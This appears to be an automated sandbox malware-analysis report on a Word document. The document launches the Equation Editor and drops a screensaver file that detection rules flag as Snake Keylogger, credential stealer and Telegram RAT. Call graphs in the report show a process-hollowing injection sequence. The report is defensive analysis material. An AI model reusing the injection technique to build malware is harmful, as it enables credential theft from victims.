                                  2024-04-23 05:49:57 UTC1369INData Raw: 56 19 20 25 31 65 0a 1f 24 39 1e 14 65 21 2a 2a 1d 1b 39 78 1b 02 28 24 3e 24 02 58 2f 30 02 57 36 28 28 2c 02 0a 2f 2c 13 33 76 4d 47 7d 6f 78 64 39 13 05 24 6d 23 29 0d 19 26 34 19 05 26 3e 66 20 07 0c 6a 2a 19 11 65 28 3c 2c 1c 58 3d 3d 1f 01 65 28 2e 11 49 78 4b 73 76 77 45 4d 46 21 6f 79 42 58 76 59 20 2a 28 24 1d 58 2f 34 14 16 29 21 29 37 0c 0b 6a 3d 1e 03 65 2b 29 65 0a 0d 26 39 00 57 31 24 2b 2c 03 58 38 3d 06 07 30 6d 23 2d 3b 56 4a 59 45 77 45 63 23 22 01 19 38 78 13 1b 27 2c 2a 29 00 0a 29 2b 56 12 2d 39 66 23 00 58 2f 2d 1a 16 33 6d 32 2c 02 11 26 78 04 12 32 22 2a 65 0a 10 1e 76 76 76 76 4d 46 6b 1c 0c 24 3d 05 12 37 3d 23 37 4f 16 25 31 02 1e 36 22 36 65 0d 15 3f 30 02 57 29 21 29 37 0c 0b 6a 3d 1e 03 65 39 27 2d 1b 58 2f 2d 1a 16 33 6d 23
                                  Data Ascii: V %1e$9e!**9x($>$X/0W6((,/,3vMG}oxd9$m#)&4&>f j*e(<,X==e(.IxKsvwEMF!oyBXvY *($X/4)!)7j=e+)e&9W1$+,X8=0m#-;VJYEwEc#"8x',*))+V-9f#X/-3m2,&x2"*evvvvMFk$=7=#7O%16"6e?0W)!)7j=e9'-X/-3m#


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:07:49:53
                                  Start date:23/04/2024
                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                  Imagebase:0x13f1c0000
                                  File size:1'423'704 bytes
                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:2
                                  Start time:07:49:54
                                  Start date:23/04/2024
                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                  Imagebase:0x400000
                                  File size:543'304 bytes
                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:07:49:57
                                  Start date:23/04/2024
                                  Path:C:\Users\user\AppData\Roaming\mpoom39002.scr
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\mpoom39002.scr"
                                  Imagebase:0x260000
                                  File size:331'264 bytes
                                  MD5 hash:37383DB5D0AAF3A258780342654AE739
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000005.00000002.346422484.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  Reputation:low
                                  Has exited:true

                                  Target ID:6
                                  Start time:07:49:57
                                  Start date:23/04/2024
                                  Path:C:\Users\user\AppData\Roaming\mpoom39002.scr
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\mpoom39002.scr"
                                  Imagebase:0x260000
                                  File size:331'264 bytes
                                  MD5 hash:37383DB5D0AAF3A258780342654AE739
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Target ID:7
                                  Start time:07:50:16
                                  Start date:23/04/2024
                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                  Imagebase:0x400000
                                  File size:543'304 bytes
                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Reset < >
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0032F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_32f000_EQNEDT32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 78f76ca898e79cbc45879f41596254f71a24cfd604ed32f7b0680a142d3288a5
                                    • Instruction ID: 0f9e05aa46237e7af19e8efa78926043603d2640fa7adc2a7f86a33e92f85be5
                                    • Opcode Fuzzy Hash: 78f76ca898e79cbc45879f41596254f71a24cfd604ed32f7b0680a142d3288a5
                                    • Instruction Fuzzy Hash: 0551A92142E3C15FD307AB3548A65857F719E23280B8E5AEFC0D1DF9E7D119990EC722
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0032F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_32f000_EQNEDT32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2de92a56cab5c02f2887f7f27bd1a522d552c99a49d67456be5c0f8fb61dd50f
                                    • Instruction ID: ae43bc2f894f740b56680de5f1e9ca0e16cd142911538364d8a92651b9ccf7b0
                                    • Opcode Fuzzy Hash: 2de92a56cab5c02f2887f7f27bd1a522d552c99a49d67456be5c0f8fb61dd50f
                                    • Instruction Fuzzy Hash: 08510E9A80FBC02FE70357701D626853FB46E23258B4F14EBC5C0CF1A3E558AA4AD322
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0032F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_32f000_EQNEDT32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5fca50e3c13de1ffc140df2a2b64c020d1bc44d30f4b8295b5cc6b9a0e548df5
                                    • Instruction ID: ce28d873cda65fc5df6f372ccc4dd4f584fe7d302baee35110c7d52009bb68d2
                                    • Opcode Fuzzy Hash: 5fca50e3c13de1ffc140df2a2b64c020d1bc44d30f4b8295b5cc6b9a0e548df5
                                    • Instruction Fuzzy Hash: 5341119A80FBC02EE70357701C626853FB56E63248B4F54DBC5C1CF1B3E558AA4AD722
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0032F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_32f000_EQNEDT32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f0a55d97cda008e7576dcf22cc24f999d18fe809062c95436ae310a3a2ae0bbd
                                    • Instruction ID: 8b52e43557e50531e85bdfe52620085764a6e03a6c26fe12b49f723de267131f
                                    • Opcode Fuzzy Hash: f0a55d97cda008e7576dcf22cc24f999d18fe809062c95436ae310a3a2ae0bbd
                                    • Instruction Fuzzy Hash: 5261BE2601E3C05FD7138B7098A96923FB1AF27244F0E59EBC0C5CF8A3D228590AD767
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0032F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_32f000_EQNEDT32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6cbfa0143cdbf85856cfa23a35a16584b9957d944f10a66b1b9a0fe101eae8c6
                                    • Instruction ID: c22b0dce44903a32e4d77179703ec0f534a88d819fc50e2e26e6a455818da670
                                    • Opcode Fuzzy Hash: 6cbfa0143cdbf85856cfa23a35a16584b9957d944f10a66b1b9a0fe101eae8c6
                                    • Instruction Fuzzy Hash: F0218E2602E3C15FD753877098A6A927FB19F17204B0E59DBC0C4CF8E3D219690AD762
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:17%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:40
                                    Total number of Limit Nodes:1
                                    execution_graph 2914 1e4c98 ReadProcessMemory 2915 1e4d57 2914->2915 2916 1e3c78 2918 1e3c92 2916->2918 2917 1e3ce2 2918->2917 2920 1e3d30 2918->2920 2921 1e3d33 2920->2921 2941 1e3a68 2921->2941 2945 1e3a60 2921->2945 2922 1e42ac 2949 1e3908 2922->2949 2953 1e3910 2922->2953 2923 1e4239 2923->2922 2937 1e3a68 VirtualAllocEx 2923->2937 2938 1e3a60 VirtualAllocEx 2923->2938 2924 1e4518 2935 1e3908 WriteProcessMemory 2924->2935 2936 1e3910 WriteProcessMemory 2924->2936 2925 1e431d 2925->2924 2932 1e3908 WriteProcessMemory 2925->2932 2933 1e3910 WriteProcessMemory 2925->2933 2926 1e4556 2927 1e463e 2926->2927 2957 1e37e8 2926->2957 2961 1e3b88 2927->2961 2932->2925 2933->2925 2935->2926 2936->2926 2937->2922 2938->2922 2942 1e3aac VirtualAllocEx 2941->2942 2944 1e3b24 2942->2944 2944->2923 2946 1e3a65 VirtualAllocEx 2945->2946 2948 1e3b24 2946->2948 2948->2923 2950 1e395c WriteProcessMemory 2949->2950 2952 1e39f5 2950->2952 2952->2925 2954 1e395c WriteProcessMemory 2953->2954 2956 1e39f5 2954->2956 2956->2925 2958 1e3831 Wow64SetThreadContext 2957->2958 2960 1e38a9 2958->2960 2960->2927 2962 1e3bcc ResumeThread 2961->2962 2964 1e3c18 2962->2964 2964->2918 2965 1e4868 2966 1e48f5 CreateProcessW 2965->2966 2968 1e4a4e 2966->2968

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 1e3908-1e397b 2 1e397d-1e398f 0->2 3 1e3992-1e39f3 WriteProcessMemory 0->3 2->3 5 1e39fc-1e3a4e 3->5 6 1e39f5-1e39fb 3->6 6->5
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001E39E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: u1
                                    • API String ID: 3559483778-1112514422
                                    • Opcode ID: 72fa9813022d79350a9ee7d392e61004efa49417de51a283077d257133ac726f
                                    • Instruction ID: 04d08971eaa9c19a3dc220aeb632923f456cdd39d2728a22443be767933804be
                                    • Opcode Fuzzy Hash: 72fa9813022d79350a9ee7d392e61004efa49417de51a283077d257133ac726f
                                    • Instruction Fuzzy Hash: 8541A9B4D012589FCF00CFAAD984AEEBBF1BB49314F24942AE814B7210D378AA45CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 148 1e4868-1e48f3 149 1e490a-1e4918 148->149 150 1e48f5-1e4907 148->150 151 1e492f-1e496b 149->151 152 1e491a-1e492c 149->152 150->149 153 1e497f-1e4a4c CreateProcessW 151->153 154 1e496d-1e497c 151->154 152->151 158 1e4a4e-1e4a54 153->158 159 1e4a55-1e4b14 153->159 154->153 158->159 169 1e4b4a-1e4b55 159->169 170 1e4b16-1e4b3f 159->170 170->169
                                    APIs
                                    • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001E4A39
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 8d5d59d1997b7ea649565dc5b8932606df8e64c09517433c7e3abd86c036f588
                                    • Instruction ID: 5c8c76d07ba80667af83b2046f04fe807b5e9c5f27c194efbdbc961c0dd64d46
                                    • Opcode Fuzzy Hash: 8d5d59d1997b7ea649565dc5b8932606df8e64c09517433c7e3abd86c036f588
                                    • Instruction Fuzzy Hash: 4C81D074D00269CFDF24CFA5C884BDDBBB5BB49304F1491AAE509B7260DB309A89CF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 174 1e3910-1e397b 176 1e397d-1e398f 174->176 177 1e3992-1e39f3 WriteProcessMemory 174->177 176->177 179 1e39fc-1e3a4e 177->179 180 1e39f5-1e39fb 177->180 180->179
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001E39E3
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: f9817ce26802ee9458f2e9457436d3219a3e175998f9459cbe3b06752f9488ca
                                    • Instruction ID: 700d006f55beefe897a7b10c5ba363212f92ccebe3ba5f90dbd02c8ef40044c2
                                    • Opcode Fuzzy Hash: f9817ce26802ee9458f2e9457436d3219a3e175998f9459cbe3b06752f9488ca
                                    • Instruction Fuzzy Hash: D841AAB5D012589FCF00CFAAD984AEEFBF1BB49314F24942AE814B7210D774AA45CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 185 1e3a60-1e3b22 VirtualAllocEx 189 1e3b2b-1e3b75 185->189 190 1e3b24-1e3b2a 185->190 190->189
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001E3B12
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 2e503ac8e2ecd7e615661f845bfb41e17e419ff262b6b20fca29ec55afa9196a
                                    • Instruction ID: 39be13704f101526513925399cc9702bdf46616306738eee8d7eee20ca2b3b15
                                    • Opcode Fuzzy Hash: 2e503ac8e2ecd7e615661f845bfb41e17e419ff262b6b20fca29ec55afa9196a
                                    • Instruction Fuzzy Hash: 5131ABB8D00258DFCF10CFA9D984AEEFBB1BB49310F20952AE825BB250D775A945CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 195 1e3a68-1e3b22 VirtualAllocEx 198 1e3b2b-1e3b75 195->198 199 1e3b24-1e3b2a 195->199 199->198
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001E3B12
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: a44739440068e04cf248e3909d2cc488fda9d92b563dba115454ecc6f71f2bae
                                    • Instruction ID: f4df26359cb7b499b7bbb9e7be1ffd221268f29f4a351b9ffbf0bda9c4dd21de
                                    • Opcode Fuzzy Hash: a44739440068e04cf248e3909d2cc488fda9d92b563dba115454ecc6f71f2bae
                                    • Instruction Fuzzy Hash: 5A3188B8D00258DFCF10CFA9D984ADEFBB5BB49310F20942AE815BB210D735AA45CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 204 1e4c98-1e4d55 ReadProcessMemory 205 1e4d5e-1e4d9c 204->205 206 1e4d57-1e4d5d 204->206 206->205
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001E4D45
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: a92e6733b2995979960248a147a9c78db41e38ab8768800f1325738c4c14f22d
                                    • Instruction ID: 72c9947c2bbb9797a2cc4d42f0569eb71c264b901d47476b7e0b0e7a80ad621d
                                    • Opcode Fuzzy Hash: a92e6733b2995979960248a147a9c78db41e38ab8768800f1325738c4c14f22d
                                    • Instruction Fuzzy Hash: 723188B9D00258DFCF10CFAAD984ADEFBB5BB19310F24902AE814B7210D335AA45CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 209 1e37e8-1e3848 211 1e385f-1e38a7 Wow64SetThreadContext 209->211 212 1e384a-1e385c 209->212 214 1e38a9-1e38af 211->214 215 1e38b0-1e38fc 211->215 212->211 214->215
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 001E3897
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 4d7826c0bffcc71e17718715206e095df18332dbffdc7b1230f0f196f1131357
                                    • Instruction ID: 244d907575c1af0f45109d9ec65f58cc18897c570811e2e2ce005db353b5cbcc
                                    • Opcode Fuzzy Hash: 4d7826c0bffcc71e17718715206e095df18332dbffdc7b1230f0f196f1131357
                                    • Instruction Fuzzy Hash: C031BBB4D00258DFDB14DFAAD988AEEBBB1BF49314F24842AE414B7250C778AA45CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 220 1e3b88-1e3c16 ResumeThread 223 1e3c1f-1e3c61 220->223 224 1e3c18-1e3c1e 220->224 224->223
                                    APIs
                                    • ResumeThread.KERNELBASE(?), ref: 001E3C06
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: aebaed0b15c4726b0b324bf760ca991b18aa0bd941f9265ab3db4d81f51a3a11
                                    • Instruction ID: 0a133334ad388132184163965bb041470bf688a0ea3cc434af8bdcde7ece92e6
                                    • Opcode Fuzzy Hash: aebaed0b15c4726b0b324bf760ca991b18aa0bd941f9265ab3db4d81f51a3a11
                                    • Instruction Fuzzy Hash: F031CEB4D002489FCB14CFAAD984AEEFBB4AF89310F24942AE814B7310C774A901CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.345869052.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_12d000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 11d169fdabf90897cb443ebcaf7dc3937bddae367b3ae683bd2144e0453a49cb
                                    • Instruction ID: 7db3c05d82ec6e924cc196d0f030d95878e6ff5d544af38750812ef16742c1f3
                                    • Opcode Fuzzy Hash: 11d169fdabf90897cb443ebcaf7dc3937bddae367b3ae683bd2144e0453a49cb
                                    • Instruction Fuzzy Hash: 7F21F171504240DFEB099F10F8C4B26BF75FB94328F34C569E8054B246C376D966CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.345869052.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_12d000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7c2a7613c0a56ce3c9cbe3d081ed45b9d684030b97154731165a9db01cb31c8c
                                    • Instruction ID: 9128be4a62ed7a2307a3ac15b4c2ec5e95e72cc80e6fc628e87bcb7ab62881fb
                                    • Opcode Fuzzy Hash: 7c2a7613c0a56ce3c9cbe3d081ed45b9d684030b97154731165a9db01cb31c8c
                                    • Instruction Fuzzy Hash: A211D376504280CFDB05CF10E9C4B56BF72FB94314F34C6A9D8094B256C33AD96ACBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:22.2%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:46.5%
                                    Total number of Nodes:258
                                    Total number of Limit Nodes:4
                                    execution_graph 11869 1f2db8 11969 1f2dca 11869->11969 11870 1f2e4d LdrInitializeThunk 11978 1f51c1 11870->11978 11871 1f2e5b 11982 1f72f8 11871->11982 11875 1f2e93 12003 3f0040 11875->12003 11877 1f2ea1 12015 3f08e0 11877->12015 12019 3f08f0 11877->12019 11878 1f2ea8 12023 3f0d48 11878->12023 12027 3f0d38 11878->12027 11879 1f2eaf 12031 3f1192 11879->12031 12035 3f11a0 11879->12035 11880 1f2eb6 12039 3f15f8 11880->12039 12043 3f15ea 11880->12043 11881 1f2ebd 12047 3f1a50 11881->12047 12051 3f1a40 11881->12051 11882 1f2ec4 12055 3f1ea8 11882->12055 12059 3f1e98 11882->12059 11883 1f2ecb 12063 3f22f0 11883->12063 12067 3f2300 11883->12067 11884 1f2ed2 12071 3f2758 11884->12071 12075 3f2749 11884->12075 11885 1f2ed9 12079 3f2bb0 11885->12079 12083 3f2ba0 11885->12083 11886 1f2ee0 12087 3f2ff9 11886->12087 12091 3f3008 11886->12091 11887 1f2ee7 12095 3f3451 11887->12095 12099 3f3460 11887->12099 11888 1f2eee 12103 3f38b8 11888->12103 12107 3f38a8 11888->12107 11889 1f2ef5 12111 3f3d0c 11889->12111 12115 3f3d10 11889->12115 11890 1f2efc 12119 3f4168 11890->12119 12123 3f4158 11890->12123 11891 1f2f03 12127 3f45c0 11891->12127 12131 3f45b0 11891->12131 11892 1f2f0a 12135 3f4a18 11892->12135 12139 3f4a09 11892->12139 11893 1f2f11 12143 3f8219 11893->12143 12147 3f8228 11893->12147 11894 1f2f3e 12151 3f86a8 11894->12151 12155 3f8698 11894->12155 11895 1f2f4c 12159 3f8af0 11895->12159 12163 3f8b00 11895->12163 11896 1f2f53 12167 3f8f4c 11896->12167 12171 3f8f58 11896->12171 11897 1f2f5a 12175 3f93a0 11897->12175 12179 3f93b0 11897->12179 11898 1f2f61 12183 3f97f9 11898->12183 12187 3f9808 11898->12187 11899 1f2f68 12191 3f9c50 11899->12191 12195 3f9c60 11899->12195 11900 1f2f6f 12199 3fa0e0 11900->12199 12203 3fa0d1 11900->12203 11901 1f2f7d 12207 3fa538 11901->12207 12211 3fa52c 11901->12211 11902 1f2f84 12215 3fa980 11902->12215 12219 3fa990 11902->12219 11903 1f2f8b 12223 3fade8 11903->12223 12227 3fadd9 11903->12227 11904 1f2f92 12231 3fb240 11904->12231 12235 3fb230 11904->12235 11905 1f2f99 12239 3fb698 11905->12239 12243 3fb688 11905->12243 11906 1f2fa0 12247 3fbaf0 11906->12247 11908 1f2fae 11969->11870 11979 1f51f2 LdrInitializeThunk 11978->11979 11981 1f52ae 11979->11981 11981->11871 11984 1f732a 11982->11984 11983 1f2e7e 11988 1ff128 11983->11988 11984->11983 12255 1fed3b 11984->12255 12259 1feba0 11984->12259 12263 1feb92 11984->12263 11991 1ff15a 11988->11991 11989 1f2e85 11992 1ff580 11989->11992 11990 1feba0 LdrInitializeThunk 11990->11991 11991->11989 11991->11990 11995 1ff5b2 11992->11995 11993 1f2e8c 11996 1ff9d8 11993->11996 11994 1feba0 LdrInitializeThunk 11994->11995 11995->11993 11995->11994 12001 1ff6ac 11996->12001 12002 1ff9e2 11996->12002 11997 1ff991 11997->11875 11998 1feba0 LdrInitializeThunk 11998->12001 11999 1ffde9 11999->11875 12000 1feba0 LdrInitializeThunk 12000->12002 12001->11997 12001->11998 12002->11999 12002->12000 12004 3f0062 LdrInitializeThunk 12003->12004 12006 1f2e9a 12004->12006 12007 3f048a 12006->12007 12011 3f0498 12006->12011 12008 3f04ba LdrInitializeThunk 12007->12008 12010 3f0574 12008->12010 12010->11877 12012 3f04ba LdrInitializeThunk 12011->12012 12014 3f0574 12012->12014 12014->11877 12016 3f0912 LdrInitializeThunk 12015->12016 12018 3f09cc 12016->12018 12018->11878 12020 3f0912 LdrInitializeThunk 12019->12020 12022 3f09cc 12020->12022 12022->11878 12024 3f0d6a LdrInitializeThunk 12023->12024 12026 3f0e24 12024->12026 12026->11879 12028 3f0d6a LdrInitializeThunk 12027->12028 12030 3f0e24 12028->12030 12030->11879 12032 3f11c2 LdrInitializeThunk 12031->12032 12034 3f127c 12032->12034 12034->11880 12036 3f11c2 LdrInitializeThunk 12035->12036 12038 3f127c 12036->12038 12038->11880 12040 3f161a LdrInitializeThunk 12039->12040 12042 3f16d4 12040->12042 12042->11881 12044 3f161a LdrInitializeThunk 12043->12044 12046 3f16d4 12044->12046 12046->11881 12048 3f1a72 LdrInitializeThunk 12047->12048 12050 3f1b2c 12048->12050 12050->11882 12052 3f1a72 LdrInitializeThunk 12051->12052 12054 3f1b2c 12052->12054 12054->11882 12056 3f1eca LdrInitializeThunk 12055->12056 12058 3f1f84 12056->12058 12058->11883 12060 3f1eca LdrInitializeThunk 12059->12060 12062 3f1f84 